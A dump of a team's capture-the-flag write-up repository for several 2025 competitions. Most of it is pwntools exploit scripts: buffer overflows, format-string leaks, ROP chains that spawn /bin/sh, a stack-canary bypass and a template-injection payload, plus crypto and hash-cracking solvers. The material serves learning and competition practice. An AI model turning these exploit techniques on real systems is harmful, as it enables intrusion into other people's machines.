https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_02_28_PwnMeCTFQuals25/pwn/got/got.zip -------------------------------------------------------------------------------- /2025_03_07_KalmarCTF25/Ez ⛳ v3/writeup.md: -------------------------------------------------------------------------------- 1 | [KalmarCTF](https://ctftime.org/event/2599) 2 | 3 | # Ez ⛳ v3 (web) 4 | 5 | ## Solution 6 | This is an SSTI (server-side template injection) challenge in a config file. The vulnerable code is here: 7 | ```Caddyfile 8 | respond /headers `{{ .Req.Header | mustToPrettyJson }}` 9 | ``` 10 | 11 | Every header gets reflected and `mustToPrettyJson` expands `{{ }}`. 12 | So you just need to call ```{{ env `FLAG` }}```; neither `"` nor `'` works for the argument part, but `` ` `` does.
13 | 14 | ## Flag 15 | `kalmar{4n0th3r_K4lmarCTF_An0Th3R_C4ddy_Ch4ll}` 16 | 17 | shafouz 2025/03/08 18 | -------------------------------------------------------------------------------- /2025_03_07_KalmarCTF25/README.md: -------------------------------------------------------------------------------- 1 | # KalmarCTF 2025 Writeups 2 | 3 | https://ctftime.org/event/2599 4 | 5 | 103rd place 541 points 6 | -------------------------------------------------------------------------------- /2025_03_07_PearlCTF25/README.md: -------------------------------------------------------------------------------- 1 | # Pearl CTF 2025 Writeups 2 | 3 | https://ctftime.org/event/2647 4 | 5 | 64th place 1600 points 6 | -------------------------------------------------------------------------------- /2025_03_07_PearlCTF25/crypto/o1_punch_log/o_1__punch_log.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_07_PearlCTF25/crypto/o1_punch_log/o_1__punch_log.zip -------------------------------------------------------------------------------- /2025_03_07_PearlCTF25/crypto/stegano_ellipto_graphy/hacked.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_07_PearlCTF25/crypto/stegano_ellipto_graphy/hacked.zip -------------------------------------------------------------------------------- /2025_03_07_PearlCTF25/pwn/mr_ropot/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./chall_patched", checksec=False) 7 | context.binary = elf 8 | 9 | libc = ELF("./libc.so.6", checksec=False) 10 | 11 | #p = elf.process() 12 | #p = elf.debug(gdbscript="") 13 | p = remote("mr---ropot.ctf.pearlctf.in", 
30009) 14 | 15 | p.sendlineafter(b"Exit\n", b"1") 16 | p.sendlineafter(b"Leave a response: \n", b"%17$p") 17 | p.readuntil(b"Your Response:\n") 18 | leak = int(p.readline().decode(), 16) 19 | libc.address = leak - 0x2a1ca 20 | 21 | p.sendline(b"2") 22 | p.readuntil(b"Leave a response: \n") 23 | 24 | rop = ROP(libc) 25 | rop.raw(b"A" * 0x38) 26 | rop.rdi = p64(next(libc.search(b"/bin/sh\x00"))) 27 | rop.raw(p64(rop.find_gadget(['ret']).address)) # stack aligning ret 28 | rop.call("system") 29 | p.sendline(rop.chain()) 30 | 31 | p.readuntil(b"recorded.\n") 32 | 33 | p.sendline(b"/bin/cat flag.txt") 34 | print(p.readuntil(b"}").decode()) # pearl{fin4lly_g0t_my_fl4g_th4nks_printf} 35 | -------------------------------------------------------------------------------- /2025_03_07_PearlCTF25/pwn/mr_ropot/mrropot.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_07_PearlCTF25/pwn/mr_ropot/mrropot.zip -------------------------------------------------------------------------------- /2025_03_07_PearlCTF25/pwn/readme_please/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./main", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("readme-please.ctf.pearlctf.in", 30039) 12 | 13 | p.sendlineafter(b"file name:", b"files/flag.txt") 14 | 15 | payload = b"A" * ((0x108 - 0x98) + 1) 16 | p.sendlineafter(b"Enter password: ", payload) 17 | 18 | p.sendlineafter(b"file name:", b"files/flag.txt") 19 | 20 | payload = b"A" 21 | p.sendlineafter(b"Enter password: ", payload) 22 | 23 | print(p.readuntil(b"}").decode()) # pearl{f1l3_d3script0rs_4r3_c00l} 24 | -------------------------------------------------------------------------------- 
/2025_03_07_PearlCTF25/pwn/readme_please/readme_src.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_07_PearlCTF25/pwn/readme_please/readme_src.zip -------------------------------------------------------------------------------- /2025_03_07_PearlCTF25/pwn/treasure_hunt/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./vuln", checksec=False) 7 | context.binary = elf 8 | 9 | ##p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("treasure-hunt.ctf.pearlctf.in", 30008) 12 | 13 | p.sendlineafter(b"proceed: ", b"whisp3ring_w00ds") 14 | p.sendlineafter(b"proceed: ", b"sc0rching_dunes") 15 | p.sendlineafter(b"proceed: ", b"eldorian_ech0") 16 | p.sendlineafter(b"proceed: ", b"shadow_4byss") 17 | 18 | p.readuntil(b"win:- ") 19 | 20 | payload = b"" 21 | payload += b"A" * 0x48 22 | payload += p64(elf.sym["setEligibility"]) 23 | payload += p64(elf.sym["winTreasure"]) 24 | p.sendline(payload) 25 | 26 | p.readuntil(b"GGs\n") 27 | 28 | print(p.readuntil(b"}").decode()) # pearl{k33p_0n_r3turning_l0l} 29 | -------------------------------------------------------------------------------- /2025_03_07_PearlCTF25/pwn/treasure_hunt/treasurehunt.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_07_PearlCTF25/pwn/treasure_hunt/treasurehunt.zip -------------------------------------------------------------------------------- /2025_03_14_UTCTF25/README.md: -------------------------------------------------------------------------------- 1 | # UTCTF 2025 Writeups 2 | 3 | https://ctftime.org/event/2641 4 | 5 | 238th place 2627 points 6 | 
-------------------------------------------------------------------------------- /2025_03_14_UTCTF25/crypto/RSA/rsa.txt: -------------------------------------------------------------------------------- 1 | n: 21507386633439519550169998646896627263990342978145866337442653437291500212804540039826669967421406761783804525632864075787433199834243745244830254423626433057121784913173342863755047712719972310827106310978325541157116399004997956022957497614561358547338887866829687642469922480325337783646738698964794799137629074290136943475809453339879850896418933264952741717996251598299033247598332283374311388548417533241578128405412876297518744631221434811566527970724653020096586968674253730535704100196440896139791213814925799933321426996992353761056678153980682453131865332141631387947508055668987573690117314953760510812159 2 | e: 3 3 | c: 6723702102195566573155033480869753489283107574855029844328060266358539778148984297827300182772738267875181687326892460074882512254133616280539109646843128644207390959955541800567609034853 4 | -------------------------------------------------------------------------------- /2025_03_14_UTCTF25/crypto/espathra-csatu-banette/main.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from Crypto.Cipher import AES 4 | from Crypto.Util.Padding import pad 5 | key = open("/src/key", "rb").read() 6 | secret = open("/src/flag.txt", "r").read() 7 | cipher = AES.new(key, AES.MODE_ECB) 8 | 9 | while 1: 10 | print('Enter text to be encrypted: ', end='') 11 | x = input() 12 | chksum = sum(ord(c) for c in x) % (len(x)+1) 13 | pt = x[:chksum] + secret + x[chksum:] 14 | ct = cipher.encrypt(pad(pt.encode('utf-8'), AES.block_size)) 15 | print(hex(int.from_bytes(ct, byteorder='big'))) -------------------------------------------------------------------------------- /2025_03_14_UTCTF25/pwn/RETirement_plan/go.py: -------------------------------------------------------------------------------- 1 | 
#!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./shellcode_patched", checksec=False) 7 | context.binary = elf 8 | 9 | libc = ELF("./libc.so.6", checksec=False) 10 | 11 | #p = elf.process() 12 | #p = elf.debug(gdbscript="b *0x40063c") 13 | p = remote("challenge.utctf.live", 9009) 14 | 15 | BSS = 0x601f00 16 | 17 | rop = ROP(elf) 18 | rop.raw(p64(BSS) * (0x48 // 8)) 19 | rop.puts(elf.got["puts"]) 20 | rop.raw(elf.sym["main"]) 21 | p.sendlineafter(b"here>: \n", rop.chain()) 22 | 23 | leak = u64(p.recv(6) + b"\x00\x00") 24 | libc.address = leak - libc.sym["puts"] 25 | #log.success(f"libc: {hex(libc.address)}") 26 | 27 | rop = ROP(libc) 28 | rop.raw(p64(BSS) * (0x48 // 8)) 29 | rop.rdi = p64(next(libc.search(b"/bin/sh\x00"))) 30 | rop.raw(p64(rop.find_gadget(['ret']).address)) # stack aligning ret 31 | rop.call("system") 32 | p.sendlineafter(b"here>: \n", rop.chain()) 33 | 34 | p.sendline(b"/bin/cat /flag.txt") 35 | 36 | print(p.readuntil(b"}").decode()) # utflag{i_should_be_doing_ccdc_rn} 37 | -------------------------------------------------------------------------------- /2025_03_14_UTCTF25/pwn/RETirement_plan/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_14_UTCTF25/pwn/RETirement_plan/libc.so.6 -------------------------------------------------------------------------------- /2025_03_14_UTCTF25/pwn/RETirement_plan/shellcode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_14_UTCTF25/pwn/RETirement_plan/shellcode -------------------------------------------------------------------------------- /2025_03_14_UTCTF25/pwn/secbof/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:22.04 2 
| 3 | RUN apt-get update 4 | RUN apt-get update && apt-get install -y build-essential socat libseccomp-dev 5 | 6 | ARG FLAG 7 | ARG USER 8 | ENV USER $USER 9 | ENV FLAG $FLAG 10 | 11 | WORKDIR / 12 | COPY start.sh /start.sh 13 | 14 | 15 | RUN chmod 755 /start.sh && \ 16 | echo "$FLAG" > /flag.txt && \ 17 | chown root:root /flag.txt && \ 18 | chmod 644 /flag.txt 19 | 20 | EXPOSE 9000 21 | 22 | WORKDIR / 23 | COPY chal /chal 24 | RUN chmod +x /chal 25 | 26 | CMD ["/start.sh"] 27 | -------------------------------------------------------------------------------- /2025_03_14_UTCTF25/pwn/secbof/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_14_UTCTF25/pwn/secbof/chal -------------------------------------------------------------------------------- /2025_03_14_UTCTF25/pwn/secbof/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | while [ true ]; do 4 | socat -dd TCP4-LISTEN:9000,fork,reuseaddr EXEC:'/chal',pty,echo=0,rawer,iexten=0 5 | done; 6 | -------------------------------------------------------------------------------- /2025_03_15_Nowruz1404/README.md: -------------------------------------------------------------------------------- 1 | # Nowruz 1404 Writeups 2 | 3 | https://ctftime.org/event/2601 4 | 5 | 101st place 1225 points 6 | -------------------------------------------------------------------------------- /2025_03_15_Nowruz1404/crypto/ez_rsa/EZ_RSA.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.number import getPrime 2 | import os 3 | 4 | flag = os.getenv("FLAG", "FMCTF{F4K3_FL49}") 5 | m = int(flag.encode().hex(), 16) 6 | 7 | p = getPrime(512) 8 | q = getPrime(512) 9 | 10 | n = p*q 11 | e = 65537 12 | c = pow(m, e, n) 13 | 14 | hint = p+q 15 | 16 | print(f"{hint = }") 17 | print(f"{n = }") 18 | 
print(f"{c = }") 19 | 20 | # hint = 17469292153344571442220879753705314094982989674618803961044325274734902918518047825543639089360378046111761829828690097867206972174713085299385569035446604 21 | # n = 72178676992512160441554160179592383158203955928083976740488546189244761660478121450369459709272987174826935459768807973546852656122370605905453926547673003297830819475396600384101353650933279529161854454268770358323854195264696322371766082303954604264551309576730976571309522883511488619775495703381232031179 22 | # c = 58920849369961001974878540043377399205173235403895163231084588694712964281923344842680972991777380071418111292770515352012869237864259800540355713208626735820573601770413846338478651482053989341163751620131823006414875347921150338651475973491744075397194132475674270761198474531891598902225518350430719735601 23 | -------------------------------------------------------------------------------- /2025_03_15_Nowruz1404/crypto/ez_xor/EZ_XOR.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | FLAG = os.environ.get("FLAG", "FMCTF{F4K3_FL49}").encode() 3 | key = os.urandom(7) 4 | encryptedFlag = xor(FLAG, key).hex() 5 | print(f"encryptedFlag = {encryptedFlag}") 6 | # encryptedFlag = a850d725cb56b0de4fcb40de72a4df56a72ec06cafa75ecb41f51c95 -------------------------------------------------------------------------------- /2025_03_15_Nowruz1404/crypto/ez_xor/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | enc_flag = bytes.fromhex("a850d725cb56b0de4fcb40de72a4df56a72ec06cafa75ecb41f51c95") 6 | 7 | key = xor(b"FMCTF{", enc_flag[:6]) + xor(b"}", enc_flag[-1:]) 8 | 9 | flag = xor(enc_flag, key) 10 | 11 | print(flag.decode()) # FMCTF{X0R_1S_L1K3_MAGIC_0x1} 12 | -------------------------------------------------------------------------------- /2025_03_15_Nowruz1404/crypto/ez_xor/writeup.md: 
-------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2601 2 | 3 | # ez xor (crypto) 4 | 5 | Welcome to your first crypto challenge! 🕵️‍♂️ This one is all about XOR, one of the simplest yet most widely used operations in cryptography. Can you uncover the hidden flag? 6 | 7 | ## Solution 8 | The key is 7 bytes long and repeats across the 28-byte ciphertext, so known plaintext recovers it: the `FMCTF{` prefix gives key bytes 0-5 and the closing `}` at index 27 (27 mod 7 = 6) gives key byte 6. A short repeating XOR key gives no secrecy once that much plaintext is known. 9 | ```python 10 | #!/usr/bin/env python3 11 | 12 | from pwn import * 13 | 14 | enc_flag = bytes.fromhex("a850d725cb56b0de4fcb40de72a4df56a72ec06cafa75ecb41f51c95") 15 | 16 | key = xor(b"FMCTF{", enc_flag[:6]) + xor(b"}", enc_flag[-1:]) 17 | 18 | flag = xor(enc_flag, key) 19 | 20 | print(flag.decode()) # FMCTF{X0R_1S_L1K3_MAGIC_0x1} 21 | ``` 22 | 23 | ## Flag 24 | `FMCTF{X0R_1S_L1K3_MAGIC_0x1}` 25 | 26 | smiley 2025/03/15 27 | -------------------------------------------------------------------------------- /2025_03_15_Nowruz1404/pwn/seen_guessing/chall: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_15_Nowruz1404/pwn/seen_guessing/chall -------------------------------------------------------------------------------- /2025_03_15_Nowruz1404/pwn/seen_guessing/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./chall", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("164.92.176.247", 5002) 12 | 13 | for i in range(7): 14 | seen_addr = u64(elf.read(elf.sym["seens"] + (i*8), 8)) 15 | p.sendlineafter(b"Enter a Seen: ", elf.read(seen_addr, 0x28) + p64(elf.sym["win"])) 16 | 17 | p.readuntil(b"{") 18 | 19 | print("FMCTF" + p.readuntil(b"}").decode()) # FMCTF{db8aa102093c65b674a0c216dac7cd73} 20 | --------------------------------------------------------------------------------
/2025_03_15_Nowruz1404/pwn/seen_shop/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | 7 | p = remote("164.92.176.247", 9000) 8 | 9 | def add_to_basket(item, quantity): 10 | p.sendlineafter(b"choice: ", b"1") 11 | p.sendlineafter(b"add (1-7): ", str(item).encode()) 12 | p.sendlineafter(b"quantity: ", str(quantity).encode()) 13 | 14 | def checkout(): 15 | p.sendlineafter(b"choice: ", b"2") 16 | 17 | add_to_basket(item=7, quantity=10000000000) 18 | checkout() 19 | 20 | p.readuntil(b"oh... pole ke mirize...\n") 21 | 22 | print(p.readuntil(b"}").decode()) # FMCTF{61346013e4b1e77a2f1b3675abc62c62} 23 | -------------------------------------------------------------------------------- /2025_03_21_CyberApocalypse25/README.md: -------------------------------------------------------------------------------- 1 | # Cyber Apocalypse CTF 2025 Writeups 2 | 3 | https://ctftime.org/event/2674 4 | 5 | 1930th place 7925 points 6 | -------------------------------------------------------------------------------- /2025_03_21_CyberApocalypse25/crypto/hourcle/crypto_hourcle.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_21_CyberApocalypse25/crypto/hourcle/crypto_hourcle.zip -------------------------------------------------------------------------------- /2025_03_21_CyberApocalypse25/crypto/traces/crypto_traces.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_21_CyberApocalypse25/crypto/traces/crypto_traces.zip -------------------------------------------------------------------------------- /2025_03_21_CyberApocalypse25/pwn/quack_quack/go.py: 
-------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./quack_quack_patched", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="b duckling") 11 | p = remote("94.237.55.91", 33274) 12 | 13 | payload = b"" 14 | payload += b"Quack Quack " 15 | payload = payload.rjust(0x65, b"Q") # left-padded with "Q" to 0x65 bytes, so the marker is the last thing sent 16 | 17 | p.sendlineafter(b"Quack the Duck!\n\n> ", payload) 18 | 19 | p.readuntil(b"Quack Quack ") # skip the reply up to the marker; the 7 bytes after it are read next 20 | 21 | canary = u64(b"\x00" + p.read(7)) # those 7 bytes plus a leading zero byte are taken as the stack canary (glibc keeps its low byte zero). NOTE(review): a reply that discloses stack bytes defeats the stack protector for any later overflow in the same process 22 | 23 | payload = b"" 24 | payload += b"Q" * 0x58 25 | payload += p64(canary) + p64(0) # leaked canary put back unchanged, then 8 zero bytes (presumably the saved frame pointer slot, confirm against the binary) 26 | payload += p16(elf.sym["duck_attack"] & 0xffff) # only the low 16 bits of duck_attack are sent: a 2-byte partial overwrite of what follows 27 | 28 | p.sendline(payload) 29 | 30 | p.readuntil(b"HTB{") 31 | print("HTB{" + p.readuntil(b"}").decode()) # HTB{~c4n4ry_g035_qu4ck_qu4ck~_d013ad2c60990274d4b4e73c5d6713a2} 32 | -------------------------------------------------------------------------------- /2025_03_21_CyberApocalypse25/pwn/quack_quack/pwn_quack_quack.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_21_CyberApocalypse25/pwn/quack_quack/pwn_quack_quack.zip -------------------------------------------------------------------------------- /2025_03_21_WolvCTF25/README.md: -------------------------------------------------------------------------------- 1 | # WolvCTF 2025 Writeups 2 | 3 | https://ctftime.org/event/2579 4 | 5 | 106th place 1784 points 6 | -------------------------------------------------------------------------------- /2025_03_21_WolvCTF25/crypto/ecb++/dist.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_21_WolvCTF25/crypto/ecb++/dist.tar.gz
-------------------------------------------------------------------------------- /2025_03_21_WolvCTF25/pwn/drywall/dist.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_21_WolvCTF25/pwn/drywall/dist.tar.gz -------------------------------------------------------------------------------- /2025_03_21_WolvCTF25/pwn/takenote/dist.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_21_WolvCTF25/pwn/takenote/dist.tar.gz -------------------------------------------------------------------------------- /2025_03_28_SwampCTF25/README.md: -------------------------------------------------------------------------------- 1 | # SwampCTF 2025 Writeups 2 | 3 | https://ctftime.org/event/2573 4 | 5 | 259th place 658 points 6 | -------------------------------------------------------------------------------- /2025_03_28_SwampCTF25/crypto/rock_my_password/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from hashlib import md5, sha256, sha512 4 | 5 | flag_hash = bytes.fromhex("f600d59a5cdd245a45297079299f2fcd811a8c5461d979f09b73d21b11fbb4f899389e588745c6a9af13749eebbdc2e72336cc57ccf90953e6f9096996a58dcc") 6 | 7 | f = open("/opt/SecLists/Passwords/Leaked-Databases/rockyou.txt", "r") # NOTE(review): the handle is never closed; `with open(...)` would scope it 8 | 9 | for i in range(14344391): # hard-coded count, presumably the wordlist's line count; iterating the file object would not need it 10 | try: 11 | p = f.readline().strip().encode() 12 | except: # bare except: any error while reading a line is skipped silently 13 | continue 14 | 15 | if len(p) != 10: # only 10-byte candidates are tested 16 | continue 17 | 18 | flag = b"swampCTF{" + p + b"}" 19 | h = flag 20 | 21 | for j in range(100): # 100 chained rounds each of MD5, then SHA-256, then SHA-512 22 | h = md5(h).digest() 23 | 24 | for j in range(100): 25 | h = sha256(h).digest() 26 | 27 | for j in range(100): 28 | h = sha512(h).digest() 29 | 30 | if h == flag_hash: # NOTE(review): an unsalted chain of 300 fast hashes is matched here by one pass over a public wordlist; password storage needs a salted, memory-hard KDF (argon2id, scrypt, bcrypt) 31 | print(flag.decode()) # swampCTF{secretcode} 32 |
break 33 | -------------------------------------------------------------------------------- /2025_03_28_SwampCTF25/pwn/beginner_pwn_1/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./is_admin", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("chals.swampctf.com", 40004) 12 | 13 | p.sendline(b"A" * 16) 14 | 15 | p.sendline(b"y") 16 | 17 | p.readuntil(b"swampCTF{") 18 | 19 | print("swampCTF{" + p.readuntil(b"}").decode()) # swampCTF{n0t_@11_5t@ck5_gr0w_d0wn} 20 | -------------------------------------------------------------------------------- /2025_03_28_SwampCTF25/pwn/beginner_pwn_1/is_admin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_28_SwampCTF25/pwn/beginner_pwn_1/is_admin -------------------------------------------------------------------------------- /2025_03_28_SwampCTF25/pwn/beginner_pwn_1/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2573 2 | 3 | # beginner_pwn_1 (pwn) 4 | 5 | Are you really admin? 6 | 7 | This challenge serves as an introduction to pwn that new ctfers can use to grasp basic pwn concepts. 
8 | 9 | nc chals.swampctf.com 40004 10 | 11 | ## Solution 12 | 13 | ```python 14 | #!/usr/bin/env python3 15 | 16 | from pwn import * 17 | 18 | #context.log_level = "debug" 19 | elf = ELF("./is_admin", checksec=False) 20 | context.binary = elf 21 | 22 | #p = elf.process() 23 | #p = elf.debug(gdbscript="") 24 | p = remote("chals.swampctf.com", 40004) 25 | 26 | p.sendline(b"A" * 16) 27 | 28 | p.sendline(b"y") 29 | 30 | p.readuntil(b"swampCTF{") 31 | 32 | print("swampCTF{" + p.readuntil(b"}").decode()) # swampCTF{n0t_@11_5t@ck5_gr0w_d0wn} 33 | ``` 34 | 35 | ## Flag 36 | `swampCTF{n0t_@11_5t@ck5_gr0w_d0wn}` 37 | 38 | smiley 2025/03/29 39 | -------------------------------------------------------------------------------- /2025_03_28_SwampCTF25/pwn/beginner_pwn_2/binary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_28_SwampCTF25/pwn/beginner_pwn_2/binary -------------------------------------------------------------------------------- /2025_03_28_SwampCTF25/pwn/beginner_pwn_2/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./binary", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("chals.swampctf.com", 40001) 12 | 13 | payload = b"" 14 | payload += b"A" * 0x12 15 | payload += p64(elf.sym["win"]) 16 | p.sendline(payload) 17 | 18 | p.readuntil(b"swampCTF{") 19 | 20 | print("swampCTF{" + p.readuntil(b"}").decode()) # swampCTF{1t5_t1m3_t0_r3turn!!} 21 | -------------------------------------------------------------------------------- /2025_03_28_SwampCTF25/pwn/beginner_pwn_2/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2573 2 | 3 | # beginner_pwn_2 (pwn) 
4 | 5 | In this challenge there is a function which is not called. Can you fix that? 6 | 7 | nc chals.swampctf.com 40001 8 | 9 | ## Analysis 10 | 11 | ```bash 12 | Arch: amd64-64-little 13 | RELRO: Partial RELRO 14 | Stack: No canary found 15 | NX: NX enabled 16 | PIE: No PIE (0x400000) 17 | ``` 18 | 19 | `main` @ `0x401228`: 20 | 21 | - Calls `gets(local_12)`; `gets` takes no length limit, so input longer than the buffer overwrites the saved return address 22 | 23 | `win` @ `0x401186`: 24 | 25 | - Prints the flag 26 | 27 | ## Solution 28 | 29 | 1) ret2win: with no stack canary and no PIE (see the checksec output above), nothing detects the overwrite and `win` is at a fixed address, so the return address can be replaced by it. Reading the input with a bounded call such as `fgets` removes the bug. 30 | 31 | ```python 32 | #!/usr/bin/env python3 33 | 34 | from pwn import * 35 | 36 | #context.log_level = "debug" 37 | elf = ELF("./binary", checksec=False) 38 | context.binary = elf 39 | 40 | #p = elf.process() 41 | #p = elf.debug(gdbscript="") 42 | p = remote("chals.swampctf.com", 40001) 43 | 44 | payload = b"" 45 | payload += b"A" * 0x12 46 | payload += p64(elf.sym["win"]) 47 | p.sendline(payload) 48 | 49 | p.readuntil(b"swampCTF{") 50 | 51 | print("swampCTF{" + p.readuntil(b"}").decode()) # swampCTF{1t5_t1m3_t0_r3turn!!} 52 | ``` 53 | 54 | ## Flag 55 | `swampCTF{1t5_t1m3_t0_r3turn!!}` 56 | 57 | smiley 2025/03/29 58 | -------------------------------------------------------------------------------- /2025_03_28_SwampCTF25/pwn/oh_my_buffer/binary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_28_SwampCTF25/pwn/oh_my_buffer/binary -------------------------------------------------------------------------------- /2025_03_28_TAMUCTF25/README.md: -------------------------------------------------------------------------------- 1 | # TAMU CTF 2025 Writeups 2 | 3 | https://ctftime.org/event/2681 4 | 5 | 173rd place 210 points 6 | -------------------------------------------------------------------------------- /2025_03_28_TAMUCTF25/crypto/ECC/ecc.tar.gz: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_28_TAMUCTF25/crypto/ECC/ecc.tar.gz -------------------------------------------------------------------------------- /2025_03_28_TAMUCTF25/pwn/debug-1/debug-1.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_28_TAMUCTF25/pwn/debug-1/debug-1.tar.gz -------------------------------------------------------------------------------- /2025_03_28_TAMUCTF25/pwn/debug-1/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./debug-1_patched", checksec=False) 7 | context.binary = elf 8 | context.terminal = ["tmux", "splitw", "-h"] 9 | 10 | libc = ELF("./libc.so.6", checksec=False) 11 | 12 | #p = elf.process() 13 | #p = elf.debug(gdbscript="") 14 | p = remote("tamuctf.com", 443, ssl=True, sni="tamuctf_debug-1") 15 | 16 | p.sendlineafter(b"3: Exit\n\n", str(1).encode()) 17 | 18 | payload = b"" 19 | payload += b"A" * 0x58 20 | payload += p64(elf.sym["debug"]+1) 21 | p.sendlineafter(b"characters):\n\n", payload) 22 | 23 | p.sendlineafter(b"well :) )\n", str(1).encode()) 24 | 25 | p.readuntil(b"libc leak: ") 26 | leak = int(p.readline().decode(), 16) 27 | libc.address = leak - libc.sym["system"] 28 | 29 | rop = ROP(libc) 30 | rop.raw(b"A" * 0x68) 31 | rop.rdi = p64(next(libc.search(b"/bin/sh\x00"))) 32 | rop.raw(p64(rop.find_gadget(['ret']).address)) # stack aligning ret 33 | rop.call("system") 34 | p.sendline(rop.chain()) 35 | 36 | p.sendline(b"/bin/cat flag.txt") 37 | p.readuntil(b"gigem{") 38 | print("gigem{" + p.readuntil(b"}").decode()) # gigem{d3bUg61ng_n3w_c0d3_a24dcfe3} 39 | -------------------------------------------------------------------------------- /2025_04_04_Squ1rrelCTF25/README.md: 
